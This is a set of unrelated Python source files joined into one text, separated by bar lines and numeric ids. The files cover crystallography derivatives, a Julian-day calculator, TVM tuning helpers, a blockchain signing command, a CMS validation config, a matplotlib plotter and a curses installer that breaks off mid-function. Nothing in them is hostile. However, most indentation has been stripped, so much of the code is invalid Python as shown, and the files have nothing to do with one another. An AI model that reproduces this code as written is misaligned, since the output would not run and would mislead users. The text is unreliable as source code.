dp[i_occ*np+i_u] = d2_u_iso_occ
dp[i_u*np+i_fp] = d2_u_iso_fp
dp[i_fp*np+i_u] = d2_u_iso_fp
dp[i_u*np+i_fdp] = d2_u_iso_fdp
dp[i_fdp*np+i_u] = d2_u_iso_fdp
else:
paste(d2_u_star_u_star.matrix_packed_u_as_symmetric(), i_u, i_u)
paste(d2_u_star_occ, i_u, i_occ)
paste(d2_u_star_occ.matrix_transpose(), i_occ, i_u)
paste(d2_u_star_fp, i_u, i_fp)
paste(d2_u_star_fp.matrix_transpose(), i_fp, i_u)
paste(d2_u_star_fdp, i_u, i_fdp)
paste(d2_u_star_fdp.matrix_transpose(), i_fdp, i_u)
dp[i_occ*np+i_fp] = d2_occ_fp
dp[i_fp*np+i_occ] = d2_occ_fp
dp[i_occ*np+i_fdp] = d2_occ_fdp
dp[i_fdp*np+i_occ] = d2_occ_fdp
yield dp
def d2f_d_params_diag(self):
tphkl = 2 * math.pi * flex.double(self.hkl)
tphkl_outer = tphkl.matrix_outer_product(tphkl) \
.matrix_symmetric_as_packed_u()
h,k,l = self.hkl
d_exp_huh_d_u_star = flex.double([h**2, k**2, l**2, 2*h*k, 2*h*l, 2*k*l])
d2_exp_huh_d_u_star_u_star = d_exp_huh_d_u_star.matrix_outer_product(
d_exp_huh_d_u_star).matrix_symmetric_as_packed_u()
for i_scatterer,scatterer in enumerate(self.scatterers):
site_symmetry_ops = None
if (self.site_symmetry_table.is_special_position(i_scatterer)):
site_symmetry_ops = self.site_symmetry_table.get(i_scatterer)
site_constraints = site_symmetry_ops.site_constraints()
if (scatterer.flags.use_u_aniso()):
adp_constraints = site_symmetry_ops.adp_constraints()
w = scatterer.weight()
if (not scatterer.flags.use_u_aniso()):
huh = scatterer.u_iso * self.d_star_sq
dw = math.exp(mtps * huh)
gaussian = self.scattering_type_registry.gaussian_not_optional(
scattering_type=scatterer.scattering_type)
f0 = gaussian.at_d_star_sq(self.d_star_sq)
ffp = f0 + scatterer.fp
fdp = scatterer.fdp
ff = (ffp + 1j * fdp)
d2_site_site = flex.complex_double(3*(3+1)//2, 0j)
if (not scatterer.flags.use_u_aniso()):
d2_u_iso_u_iso = 0j
else:
d2_u_star_u_star = flex.complex_double(6*(6+1)//2, 0j)
for s in self.space_group:
r = s.r().as_rational().as_float()
s_site = s * scatterer.site
alpha = tphkl.dot(flex.double(s_site))
if (scatterer.flags.use_u_aniso()):
s_u_star_s = r*matrix.sym(sym_mat3=scatterer.u_star)*r.transpose()
huh = (matrix.row(self.hkl) * s_u_star_s).dot(matrix.col(self.hkl))
dw = math.exp(mtps * huh)
e = cmath.exp(1j*alpha)
site_gtmx = flex.double(r.transpose())
site_gtmx.reshape(flex.grid(3,3))
d2_site_site += (w * dw * ff * e * (-1)) * (
site_gtmx.matrix_multiply_packed_u_multiply_lhs_transpose(
tphkl_outer))
if (not scatterer.flags.use_u_aniso()):
d2_u_iso_u_iso += w * dw * ff * e * (mtps * self.d_star_sq)**2
else:
u_star_gtmx = tensor_rank_2_gradient_transform_matrix(r)
d2_u_star_u_star +=(w * dw * ff * e * mtps**2) \
* u_star_gtmx.matrix_multiply_packed_u_multiply_lhs_transpose(
d2_exp_huh_d_u_star_u_star)
if (site_symmetry_ops is None):
i_u = 3
else:
i_u = site_constraints.n_independent_params()
if (not scatterer.flags.use_u_aniso()):
i_occ = i_u + 1
elif (site_symmetry_ops is None):
i_occ = i_u + 6
else:
i_occ = i_u + adp_constraints.n_independent_params()
np = i_occ+3
if (site_symmetry_ops is not None):
gsm = site_constraints.gradient_sum_matrix()
d2_site_site = gsm.matrix_multiply_packed_u_multiply_lhs_transpose(
packed_u=d2_site_site)
if (scatterer.flags.use_u_aniso()):
gsm = adp_constraints.gradient_sum_matrix()
d2_u_star_u_star = gsm \
.matrix_multiply_packed_u_multiply_lhs_transpose(
packed_u=d2_u_star_u_star)
#
dpd = flex.complex_double(flex.grid(np,1), 0j)
def paste(d, i):
d.reshape(flex.grid(d.size(),1))
dpd.matrix_paste_block_in_place(d, i,0)
paste(d2_site_site.matrix_packed_u_diagonal(), 0)
if (not scatterer.flags.use_u_aniso()):
dpd[i_u] = d2_u_iso_u_iso
else:
paste(d2_u_star_u_star.matrix_packed_u_diagonal(), i_u)
yield dpd
def d_target_d_params(self, target):
result = flex.double()
da, db = target.da(), target.db()
for d_scatterer in self.df_d_params():
result.extend(flex.double([da * d.real + db * d.imag
for d in d_scatterer]))
return result
def d2_target_d_params(self, target):
result = []
da, db = target.da(), target.db()
daa, dbb, dab = target.daa(), target.dbb(), target.dab()
ds = list(self.df_d_params())
d2s = self.d2f_d_params()
for di0,d2i in zip(ds, d2s):
d2ij_iter = iter(d2i)
for di in di0:
row = []
for dj0 in ds:
for dj in dj0:
sum = daa * di.real * dj.real \
+ dbb * di.imag * dj.imag \
+ dab * (di.real * dj.imag + di.imag * dj.real)
if (di0 is dj0):
d2ij = next(d2ij_iter)
sum += da * d2ij.real + db * d2ij.imag
row.append(sum)
result.append(row)
return flex.double(result)
def d2_target_d_params_diag(self, target):
result = flex.double()
da, db = target.da(), target.db()
daa, dbb, dab = target.daa(), target.dbb(), target.dab()
ds = self.df_d_params()
d2sd = self.d2f_d_params_diag()
for i_scatterer,(di0,d2id) in enumerate(zip(ds, d2sd)):
for di,d2ij in zip(di0, d2id):
sum = daa * di.real * di.real \
+ dbb * di.imag * di.imag \
+ dab * 2 * di.real * di.imag \
+ da * d2ij.real + db * d2ij.imag
result.append(sum)
return result
class structure_factors:
def __init__(self, xray_structure, miller_set):
assert xray_structure.is_similar_symmetry(miller_set)
self.xray_structure = xray_structure
self.miller_indices = miller_set.indices()
def fs(self):
result = flex.complex_double()
for hkl in self.miller_indices:
result.append(structure_factor(
xray_structure=self.xray_structure, hkl=hkl).f())
return result
def f(self):
return flex.sum(self.fs())
def d_target_d_params(self, f_obs, target_type):
result = None
for hkl,obs in zip(self.miller_indices, f_obs.data()):
sf = structure_factor(xray_structure=self.xray_structure, hkl=hkl)
target = target_type(obs=obs, calc=sf.f())
contribution = sf.d_target_d_params(target=target)
if (result is None): result = contribution
else: result += contribution
return result
def d2_target_d_params(self, f_obs, target_type):
result = None
for hkl,obs in zip(self.miller_indices, f_obs.data()):
sf = structure_factor(xray_structure=self.xray_structure, hkl=hkl)
target = target_type(obs=obs, calc=sf.f())
contribution = sf.d2_target_d_params(target=target)
if (result is None): result = contribution
else: result += contribution
return result
def d2_target_d_params_diag(self, f_obs, target_type):
result = None
for hkl,obs in zip(self.miller_indices, f_obs.data()):
sf = structure_factor(xray_structure=self.xray_structure, hkl=hkl)
target = target_type(obs=obs, calc=sf.f())
contribution = sf.d2_target_d_params_diag(target=target)
if (result is None): result = contribution
else: result += contribution
return result
def d2_target_d_params_diag_cpp(self, f_obs, target_type):
da_db = flex.complex_double()
daa_dbb_dab = flex.vec3_double()
for hkl,obs in zip(self.miller_indices, f_obs.data()):
sf = structure_factor(xray_structure=self.xray_structure, hkl=hkl)
target = target_type(obs=obs, calc=sf.f())
da_db.append(complex(target.da(), target.db()))
daa_dbb_dab.append((target.daa(), target.dbb(), target.dab()))
return self.xray_structure.grads_and_curvs_target_simple(
miller_indices=f_obs.indices(), da_db=da_db, daa_dbb_dab=daa_dbb_dab)
|
1620007
|
import sys
days_in_month = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
def is_leap_year ( year ):
return year % 4 == 0 and ( year % 100 != 0 or year % 400 == 0 )
def julian_day (month, day, year):
jday = 0
for m in range(month):
jday += days_in_month[m]
if m == 2 and is_leap_year(year):
jday += 1
jday += day
return jday
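# Worked example (editor's note): julian_day(3, 1, 2020) = 31 (January) + 29 (February, leap year) + 1 = 61.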
def main():
print("Please enter three integers (a month, a day and a year): That is Julian day ", end='')
input_files = open(sys.argv[1],'r')
splitted_words = input_files.readlines()[0].split()
month = int(splitted_words[0])
days = int(splitted_words[1])
year = int(splitted_words[2])
if month < 1 or month > 12:
print ("ERROR bad month:", month)
return 1
if year < 1:
print ("ERROR bad year:", year)
return 1
days_this_month = days_in_month[month]
if month == 2 and is_leap_year(year):
days_this_month += 1
if days < 1 or days > days_this_month:
print ("ERROR bad day:", days)
return 1
print(julian_day(month, days, year))
return 0
if __name__ == "__main__":
main()
|
1620027
|
import tvm
from tvm.autotvm.measure.measure import Builder, Runner, MeasureResult, MeasureErrorNo
from flextensor.ppa_model import measure_latency
from flextensor.utils import get_iter_info
import time
class ModelBuilder(Builder):
def __init__(self, *args, **kwargs):
super(ModelBuilder, self).__init__(*args, **kwargs)
def build(self, measure_inputs):
build_results = []
for target, task, config in measure_inputs:
with target:
try:
s, bufs = task.instantiate(config)
tvm.lower(s, bufs)
build_results.append(get_iter_info(s))
except Exception as e:
print(e)
build_results.append(None)
return build_results
class ModelRunner(Runner):
def __init__(self, *args, **kwargs):
super(ModelRunner, self).__init__(*args, **kwargs)
def get_build_kwargs(self):
return {}
def run(self, measure_inputs, build_results):
results = []
for info in build_results:
l = measure_latency(info)
if l is None:
                results.append(MeasureResult(
                    [float('inf')], MeasureErrorNo.RUNTIME_DEVICE, float('inf'), time.time()))
else:
results.append(MeasureResult(
[float(l)], MeasureErrorNo.NO_ERROR, float(l), time.time()))
return results
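# A minimal usage sketch (editor's addition; assumes a flextensor/autotvm tuning task is set up).
# The model-based builder/runner stand in for hardware measurement, so candidate schedules are
# scored by the PPA latency model instead of being compiled and timed on a device:
#
#     from tvm import autotvm
#     measure_option = autotvm.measure_option(builder=ModelBuilder(), runner=ModelRunner())
#     tuner.tune(n_trial=200, measure_option=measure_option)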
|
1620040
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys, pkg_resources, imp
def __bootstrap__():
global __bootstrap__, __loader__, __file__
__file__ = pkg_resources.resource_filename(__name__, 'cython_nms.so')
__loader__ = None
del __bootstrap__, __loader__
imp.load_dynamic(__name__, __file__)
__bootstrap__()
|
1620097
|
from dataclasses import dataclass
from random import random, choice
from .. import database as db
@dataclass
class Location:
longitude: float
latitude: float
def random_location() -> Location:
"""Returns random location (lon, lat) while prioritizing (95% chance) areas with a lot of objects to export."""
if random() > 0.05:
query = db.QUERIES['locations_most_count']
else:
query = db.QUERIES['locations_random']
list_of_tuples = db.data_from_db(query, row_as=Location)
return choice(list_of_tuples)
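# Usage sketch (editor's note; assumes the database module is configured):
#     loc = random_location()
#     print(loc.longitude, loc.latitude)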
|
1620111
|
import json
import logging
from django.db import transaction
from node.blockchain.facade import BlockchainFacade
from node.blockchain.inner_models import (
CoinTransferSignedChangeRequestMessage, Node, NodeDeclarationSignedChangeRequestMessage,
PVScheduleUpdateSignedChangeRequestMessage, SignedChangeRequest
)
from node.blockchain.inner_models.signed_change_request_message import CoinTransferTransaction
from node.blockchain.types import AccountNumber, Type
from node.core.clients.node import NodeClient
from node.core.commands import CustomCommand
from node.core.database import is_in_transaction
from node.core.utils.cryptography import derive_public_key, get_signing_key
logger = logging.getLogger(__name__)
LOCAL = 'local'
def add_common_args(parser):
parser.add_argument('node-address', help='remote node address or "local" to denote local blockchain operation')
    parser.add_argument('signing-key', help='signing key or "local" to denote local node signing key')
parser.add_argument('-d', '--dry-run', action='store_true')
def get_account_lock_from_local_blockchain(public_key):
return BlockchainFacade.get_instance().get_account_lock(public_key)
def get_account_lock_from_node(node_address, public_key):
account_state = NodeClient.get_instance().get_account_state(node_address, public_key)
return account_state.account_lock
def make_message(type_, account_lock, options):
kwargs = {'account_lock': account_lock}
if type_ == Type.NODE_DECLARATION:
kwargs['node'] = Node(
identifier=derive_public_key(options['signing-key']),
fee=options['fee'],
addresses=options['address'],
)
return NodeDeclarationSignedChangeRequestMessage(**kwargs)
if type_ == Type.COIN_TRANSFER:
kwargs['txs'] = [CoinTransferTransaction.parse_raw(tx) for tx in options['transaction']]
return CoinTransferSignedChangeRequestMessage(**kwargs)
if type_ == Type.PV_SCHEDULE_UPDATE:
kwargs['schedule'] = json.loads(options['schedule'])
return PVScheduleUpdateSignedChangeRequestMessage(**kwargs)
raise NotImplementedError(f'Support for signed change request type {type_} is not implemented')
def add_block_from_signed_change_request(signed_change_request):
return BlockchainFacade.get_instance().add_block_from_signed_change_request(signed_change_request)
def send_signed_change_request(node_address, signed_change_request):
response = NodeClient.get_instance().send_signed_change_request(node_address, signed_change_request)
return response.text
class Command(CustomCommand):
help = 'Submit signed change requests of different types' # noqa: A003
@staticmethod
def add_node_declaration_arguments(subparsers):
node_declaration_parser = subparsers.add_parser(
str(Type.NODE_DECLARATION.value), help=Type.NODE_DECLARATION.name
)
add_common_args(node_declaration_parser)
node_declaration_parser.add_argument('fee', type=int)
node_declaration_parser.add_argument('address', nargs='+')
@staticmethod
def add_coin_transfer_arguments(subparsers):
coin_transfer_parser = subparsers.add_parser(str(Type.COIN_TRANSFER.value), help=Type.COIN_TRANSFER.name)
add_common_args(coin_transfer_parser)
transaction_example = CoinTransferTransaction(recipient=AccountNumber('0' * 64), amount=10,
memo='For Sam').json()
coin_transfer_parser.add_argument(
'transaction', nargs='+', help=f'Transaction JSON (example: {transaction_example})'
)
@staticmethod
def add_pv_schedule_arguments(subparsers):
pv_schedule_update_parser = subparsers.add_parser(
str(Type.PV_SCHEDULE_UPDATE.value), help=Type.PV_SCHEDULE_UPDATE.name
)
add_common_args(pv_schedule_update_parser)
schedule_example = json.dumps({
'100': AccountNumber('1' * 64),
'200': AccountNumber('2' * 64),
})
pv_schedule_update_parser.add_argument('schedule', help=f'Schedule JSON (example: {schedule_example})')
def add_arguments(self, parser):
subparsers = parser.add_subparsers(dest='type', help='Signed Change Request type')
self.add_node_declaration_arguments(subparsers)
self.add_coin_transfer_arguments(subparsers)
self.add_pv_schedule_arguments(subparsers)
def handle(self, *args, **options):
node_address = options.pop('node-address')
type_ = Type(int(options.pop('type')))
signing_key = options['signing-key']
if signing_key == LOCAL:
options['signing-key'] = signing_key = get_signing_key()
public_key = derive_public_key(signing_key)
if node_address == LOCAL:
account_lock = get_account_lock_from_local_blockchain(public_key)
else:
account_lock = get_account_lock_from_node(node_address, public_key)
message = make_message(type_, account_lock, options)
signed_change_request = SignedChangeRequest.create_from_signed_change_request_message(message, signing_key)
        self.write('Generated signed change request:')
self.write(json.dumps(signed_change_request.dict(), indent=4))
if options.pop('dry_run'):
return
if node_address == LOCAL:
if is_in_transaction():
block = add_block_from_signed_change_request(signed_change_request)
else:
with transaction.atomic():
block = add_block_from_signed_change_request(signed_change_request)
self.write(f'Block added to local blockchain: {block}')
else:
self.write('Response (raw):')
self.write(send_signed_change_request(node_address, signed_change_request))
|
1620122
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("HLTBTAG")
process.load("L1TriggerConfig.L1GtConfigProducers.L1GtConfig_cff")
process.load("DQMServices.Components.EDMtoMEConverter_cff")
process.load("HLTriggerOffline.Btag.HltBtagValidation_cff")
#process.load("HLTriggerOffline.Btag.HltBtagValidationFastSim_cff")
process.load("HLTriggerOffline.Btag.HltBtagPostValidation_cff")
#process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(500) )
process.DQM_BTag = cms.Path( process.hltbtagValidationSequence + process.HltBTagPostVal + process.dqmSaver)
import sys
import Utilities.General.cmssw_das_client as cmssw_das_client
def add_rawRelVals(process, inputName):
query='dataset='+inputName
dataset = cmssw_das_client.get_data(query, limit = 0)
if not dataset:
raise RuntimeError(
'Das returned no dataset parent of the input file: %s \n'
'The parenthood is needed to add RAW secondary input files' % process.source.fileNames[0]
)
for i in dataset['data']:
try: n_files = i['dataset'][0]['num_file']
except: pass
raw_files = cmssw_das_client.get_data('file '+query, limit = 0)
files = []
for i in raw_files['data']:
files.append( i['file'][0]['name'])
raw_files = ['root://cms-xrd-global.cern.ch/'+str(i) for i in files]
process.source = cms.Source("PoolSource", fileNames = cms.untracked.vstring(raw_files))
return process
add_rawRelVals(process, str(sys.argv[-1]))
#process.source = cms.Source("PoolSource",
# fileNames = cms.untracked.vstring(
#'root://cms-xrd-global.cern.ch//store/user/mdefranc/RelValTTbar_13/ttbarRelVal_noPU_3/180715_094624/0000/step2_50.root',
#)
#)
#Settings equivalent to 'RelVal' convention:
process.dqmSaver.convention = 'Offline'
process.dqmSaver.saveByRun = cms.untracked.int32(-1)
process.dqmSaver.saveAtJobEnd = cms.untracked.bool(True)
process.dqmSaver.forceRunNumber = cms.untracked.int32(1)
process.dqmSaver.workflow = "/test/RelVal/TrigVal"
process.DQMStore.verbose=0
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool( True ),
fileMode = cms.untracked.string('FULLMERGE'),
SkipEvent = cms.untracked.vstring('ProductNotFound')
)
|
1620134
|
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.path import Path
from matplotlib.patches import PathPatch
import numpy as np
try:
numeric_types = (int, float, long)
except NameError:
numeric_types = (int, float)
class SimpleVectorPlotter(object):
"""Plots vector data represented as lists of coordinates."""
# _graphics = {}
def __init__(self, interactive, ticks=False, figsize=None, limits=None):
"""Construct a new SimpleVectorPlotter.
interactive - boolean flag denoting interactive mode
ticks - boolean flag denoting whether to show axis tickmarks
figsize - optional figure size
limits - optional geographic limits (x_min, x_max, y_min, y_max)
"""
# if figsize:
# plt.figure(num=1, figsize=figsize)
plt.figure(num=1, figsize=figsize)
self.interactive = interactive
self.ticks = ticks
if interactive:
plt.ion()
else:
plt.ioff()
if limits is not None:
self.set_limits(*limits)
if not ticks:
self.no_ticks()
plt.axis('equal')
self._graphics = {}
self._init_colors()
def adjust_markers(self):
figsize = plt.gcf().get_size_inches()
r = min(figsize[0] / 8, figsize[1] / 6)
mpl.rcParams['lines.markersize'] = 6 * r
mpl.rcParams['lines.markeredgewidth'] = 0.5 * r
mpl.rcParams['lines.linewidth'] = r
mpl.rcParams['patch.linewidth'] = r
def adjust_markersize(self, size):
figsize = plt.gcf().get_size_inches()
r = min(figsize[0] / 8, figsize[1] / 6)
return 6 * r
def axis_on(self, on):
"""Turn the axes and labels on or off."""
if on:
plt.axis('on')
else:
plt.axis('off')
def clear(self):
"""Clear the plot area."""
plt.cla()
self._graphics = {}
if not self.ticks:
self.no_ticks()
def close(self):
"""Close the plot."""
self.clear()
plt.close()
def draw(self):
"""Draw a non-interactive plot."""
plt.show()
def hide(self, name):
"""Hide the layer with the given name."""
try:
graphics = self._graphics[name]
graphic_type = type(graphics[0])
if graphic_type is mpl.lines.Line2D:
for graphic in graphics:
plt.axes().lines.remove(graphic)
elif graphic_type is mpl.patches.Polygon or graphic_type is mpl.patches.PathPatch:
for graphic in graphics:
plt.axes().patches.remove(graphic)
else:
raise RuntimeError('{} not supported'.format(graphic_type))
except (KeyError, ValueError):
pass
def plot_line(self, data, symbol='', name='', **kwargs):
"""Plot a line.
data - list of (x, y) tuples
symbol - optional pyplot symbol to draw the line with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
graphics = self._plot_line(data, symbol, **kwargs)
self._set_graphics(graphics, name, symbol or kwargs)
def plot_multiline(self, data, symbol='', name='', **kwargs):
"""Plot a multiline.
data - list of lines, each of which is a list of (x, y) tuples
symbol - optional pyplot symbol to draw the lines with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
has_symbol = symbol or kwargs
symbol = symbol or self._line_symbol()
graphics = self._plot_multiline(data, symbol, **kwargs)
self._set_graphics(graphics, name, has_symbol)
def plot_multipoint(self, data, symbol='', name='', **kwargs):
"""Plot a multipoint.
data - list of (x, y) tuples
symbol - optional pyplot symbol to draw the points with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
has_symbol = symbol or kwargs
symbol = symbol or self._point_symbol()
        graphics = self._plot_multipoint(data, symbol, **kwargs)
self._set_graphics(graphics, name, has_symbol)
def plot_multipolygon(self, data, color='', name='', **kwargs):
"""Plot a multipolygon.
data - list of polygons, each of which is a list of rings, each of
which is a list of (x, y) tuples
color - optional pyplot color to draw the polygons with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
has_symbol = bool(color or kwargs)
if not ('facecolor' in kwargs or 'fc' in kwargs):
kwargs['fc'] = color or self._next_color()
graphics = self._plot_multipolygon(data, **kwargs)
self._set_graphics(graphics, name, has_symbol)
def plot_point(self, data, symbol='', name='', **kwargs):
"""Plot a point.
data - (x, y) tuple
symbol - optional pyplot symbol to draw the point with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
has_symbol = symbol or kwargs
symbol = symbol or self._point_symbol()
graphics = self._plot_point(data, symbol, **kwargs)
self._set_graphics(graphics, name, has_symbol)
def plot_polygon(self, data, color='', name='', **kwargs):
"""Plot a polygon.
data - list of rings, each of which is a list of (x, y) tuples
color - optional pyplot color to draw the polygon with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
has_symbol = bool(color or kwargs)
if not ('facecolor' in kwargs or 'fc' in kwargs):
kwargs['fc'] = color or self._next_color()
graphics = self._plot_polygon(data, **kwargs)
self._set_graphics(graphics, name, has_symbol)
def remove(self, name):
"""Remove a layer with the given name."""
try:
self.hide(name)
del self._graphics[name]
except KeyError:
pass
def save(self, fn, dpi=300):
plt.savefig(fn, dpi=dpi, bbox_inches='tight', pad_inches=0.02)
def set_limits(self, x_min, x_max, y_min, y_max):
"""Set geographic limits for plotting."""
self.x_lim = x_min, x_max
self.y_lim = y_min, y_max
self._set_limits()
def show(self, name):
"""Show the layer with the given name."""
try:
graphics = self._graphics[name]
graphic_type = type(graphics[0])
if graphic_type is mpl.lines.Line2D:
for graphic in graphics:
plt.axes().add_line(graphic)
elif graphic_type is mpl.patches.Polygon or graphic_type is mpl.patches.PathPatch:
for graphic in graphics:
plt.axes().add_patch(graphic)
else:
raise RuntimeError('{} not supported'.format(graphic_type))
except KeyError:
pass
def no_ticks(self):
plt.gca().get_xaxis().set_ticks([])
plt.gca().get_yaxis().set_ticks([])
def zoom(self, factor):
"""Zoom in or out by a percentage; negative is out."""
x_min, x_max, y_min, y_max = plt.axis()
x_delta = (x_max - x_min) * factor / 100
y_delta = (y_max - y_min) * factor / 100
plt.axis((x_min + x_delta, x_max - x_delta,
y_min + y_delta, y_max - y_delta))
def _clockwise(self, data):
"""Determine if points are in clockwise order."""
total = 0
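        # Shoelace-style signed area: summing (x2 - x1) * (y2 + y1) over the edges below gives a
        # positive total for clockwise vertex order (with a y-up axis convention).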
x1, y1 = data[0]
for x, y in data[1:]:
total += (x - x1) * (y + y1)
x1, y1 = x, y
x, y = data[0]
total += (x - x1) * (y + y1)
return total > 0
def _codes(self, data):
"""Get a list of codes for creating a new PathPatch."""
        codes = np.ones(len(data), dtype=int) * Path.LINETO
codes[0] = Path.MOVETO
return codes
def _init_colors(self):
if mpl.__version__ >= '1.5':
self.colors = list(mpl.rcParams['axes.prop_cycle'])
self.current_color = -1
self._next_color = self._next_color_new
else:
self._next_color = self._next_color_old
def _line_symbol(self):
"""Get a default line symbol."""
return self._next_color() + '-'
def _next_color_old(self):
"""Get the next color in the rotation."""
return next(plt.gca()._get_lines.color_cycle)
def _next_color_new(self):
"""Get the next color in the rotation."""
self.current_color += 1
if self.current_color >= len(self.colors):
self.current_color = 0
return self.colors[self.current_color]['color']
def _order_vertices(self, data, clockwise=True):
"""Order vertices in clockwise or counter-clockwise order."""
self._clockwise(data) != clockwise or data.reverse()
if data[0] != data[-1]:
data.append(data[0])
return data
def _plot_line(self, data, symbol, **kwargs):
x, y = zip(*data)
return plt.plot(x, y, symbol, **kwargs)
def _plot_multiline(self, data, symbol, **kwargs):
"""Plot a multiline."""
graphics = []
for line in data:
graphics += self._plot_line(line, symbol, **kwargs)
return graphics
def _plot_multipoint(self, data, symbol, **kwargs):
"""Plot a multipoint."""
graphics = []
for point in data:
graphics += self._plot_point(point, symbol, **kwargs)
return graphics
def _plot_multipolygon(self, data, **kwargs):
"""Plot a multipolygon."""
graphics = []
for poly in data:
graphics += self._plot_polygon(poly, **kwargs)
return graphics
def _plot_point(self, data, symbol, **kwargs):
"""Plot a point."""
return plt.plot(data[0], data[1], symbol, **kwargs)
def _plot_polygon(self, data, **kwargs):
"""Plot a polygon."""
outer = self._order_vertices(data[0], True)
inner = [self._order_vertices(d, False) for d in data[1:]]
vertices = np.concatenate(
[np.asarray(outer)] + [np.asarray(i) for i in inner])
codes = np.concatenate(
[self._codes(outer)] + [self._codes(i) for i in inner])
patch = PathPatch(Path(vertices, codes), **kwargs)
plt.axes().add_patch(patch)
return [patch]
def _point_symbol(self):
"""Get a default point symbol."""
return self._next_color() + 'o'
def _same_type(self, graphic1, graphic2):
"""Determine if two graphics are of the same type."""
if type(graphic1) is not type(graphic2):
return False
if type(graphic1) is mpl.patches.Polygon: ## huh?
return True
if len(graphic1.get_xdata()) == len(graphic2.get_xdata()):
return True
return len(graphic1.get_xdata()) > 1 and len(graphic2.get_xdata()) > 1
def _set_graphics(self, graphics, name, has_symbol):
"""Add graphics to plot."""
name = name or len(self._graphics)
if name in self._graphics:
self.hide(name)
if not has_symbol and self._same_type(graphics[0], self._graphics[name][0]):
styled_graphic = self._graphics[name][0]
for graphic in graphics:
graphic.update_from(styled_graphic)
self._graphics[name] = graphics
plt.axis('equal')
def _set_limits(self):
"""Set axis limits."""
plt.xlim(*self.x_lim)
plt.ylim(*self.y_lim)
plt.axes().set_aspect('equal')
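# A minimal usage sketch (editor's addition, not part of the original module): plot a filled
# triangle and a line layer, then save the figure; the coordinates are purely illustrative.
if __name__ == '__main__':
    plotter = SimpleVectorPlotter(interactive=False)
    plotter.plot_polygon([[(0, 0), (4, 0), (2, 3)]], color='0.7', name='triangle')
    plotter.plot_line([(0, 0), (4, 3)], symbol='r-', name='diagonal')
    plotter.save('example.png')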
|
1620135
|
from ....Methods import ParentMissingError
def get_is_stator(self):
"""Return True if the parent lamination is stator and False if is a rotor
Parameters
----------
self : Slot
A Slot object
Returns
-------
is_stator: bool
True if the Lamination is a stator and False if not
"""
if self.parent is not None:
return self.parent.is_stator
else:
raise ParentMissingError("Error: The slot is not inside a Lamination")
|
1620145
|
import os
import hashlib
import shutil
import curses
import curses.wrapper
from progressBar import progressBar
# Something went wrong during installation
class InstallerException(Exception):
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
class Installer:
def __init__(self, stdscr, package, filesdir = "./files", installdir = "./install"):
self.stdscr = stdscr
self.filesdir = filesdir
self.installdir = installdir
self.packageName = package
def setupCurses(self):
self.titlewin = self.stdscr.subwin(1, 80, 0, 0)
self.mainwin = self.stdscr.subwin(23, 80, 1, 0)
self.progwin = self.stdscr.subwin(10, 60, 6, 10)
self.statwin = self.stdscr.subwin(1, 80, 24, 0)
self.progBar = progressBar(0, 100, 56)
curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_CYAN)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_WHITE)
curses.init_pair(4, curses.COLOR_RED, curses.COLOR_WHITE)
self.titlewin.bkgd(' ', curses.color_pair(1))
self.statwin.bkgd(' ', curses.color_pair(1))
self.mainwin.bkgd(' ', curses.color_pair(2))
self.titlewin.addstr(0, 0, "Installing " + self.packageName)
self.statwin.addstr(0, 0, "Copying files...")
self.resetProgWin()
self.stdscr.refresh()
def resetProgWin(self):
self.progwin.clear()
self.progwin.bkgd(' ', curses.color_pair(1))
self.progwin.box()
self.stdscr.move(24, 79)
def statusUpdate(self, msg):
self.statwin.clear()
self.statwin.addstr(0, 1, msg)
self.statwin.refresh()
def drawAlert(self, msg, title, colour_pair):
# split the message into more manageable chunks
msgLines = msg.rstrip().split("\n")
height = len(msgLines) + 4
errwin = self.mainwin.subwin(height, 50, (24 / 2) - (height / 2), 15)
errwin.overlay(self.progwin)
errwin.clear()
errwin.bkgd(' ', curses.color_pair(1))
errwin.box()
errwin.addstr(0, 2, " " + title + " ", curses.color_pair(colour_pair))
self.statusUpdate("Press ENTER to acknowledge")
y = 2
for i in msgLines:
if(len(i) > 50):
firstPart = i[0:46]
secondPart = i[46:]
errwin.addstr(y, 2, firstPart)
y += 1
errwin.addstr(y, 2, secondPart)
else:
errwin.addstr(y, 2, i)
y += 1
errwin.refresh()
# Wait for ENTER
while 1:
c = self.stdscr.getch()
if(c == 13 or c == 10):
break
self.mainwin.clear()
self.mainwin.refresh()
self.resetProgWin()
def drawError(self, msg, title = "Error"):
self.drawAlert(msg, title, 4)
def drawWarning(self, msg, title = "Warning"):
self.drawAlert(msg, title, 3)
def drawProgress(self, action, fileName, progress):
self.progwin.addstr(1, 2, action + ", please wait...")
self.progwin.addstr(3, 2, fileName)
self.progBar.updateAmount(progress)
self.progwin.addstr(5, 2, str(self.progBar))
self.progwin.refresh()
self.resetProgWin()
def InstallerPage(self, msg):
introwin = self.mainwin.subwin(20, 70, 3, 5)
introwin.clear()
introwin.box()
introwin.bkgd(' ', curses.color_pair(1))
msgLines = msg.split("\n")
msgNum = len(msgLines)
y = (20 / 2) - (msgNum / 2)
for i in msgLines:
introwin.addstr(y, (70 / 2) - (len(i) / 2), i)
y += 1
introwin.refresh()
self.waitForKeyPress()
self.mainwin.clear()
self.mainwin.refresh()
def introPage(self):
msg = "Welcome to the " + self.packageName + " installation!"
msg += "\n\n\n"
msg += "The next steps will guide you through the installation of " + self.packageName + "."
msg += "\n\n"
msg += "Press ENTER to continue."
self.InstallerPage(msg)
def done(self):
msg = self.packageName + " is now installed!"
msg += "\n\n\n"
msg += "Remove the CD from the disk drive and press any key to reboot."
self.InstallerPage(msg)
def selectDest(self):
pass
def installFiles(self):
# Open the file listing. This file contains information about each file that
# we are to install.
try:
fileList = open(self.filesdir + "/filelist.txt")
except:
# Pass it up to the caller
self.drawError("Couldn't open file list for reading.")
raise
